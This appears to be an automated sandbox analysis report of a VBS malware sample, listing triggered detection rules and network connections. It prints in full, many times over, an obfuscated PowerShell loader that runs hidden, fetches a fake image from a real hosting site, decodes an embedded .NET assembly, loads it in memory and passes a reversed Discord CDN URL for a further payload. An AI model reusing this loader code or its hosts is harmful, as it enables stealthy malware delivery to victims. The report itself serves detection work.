redQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6696, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49716
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 6696, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6696, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49716
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs", ProcessId: 6696, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = 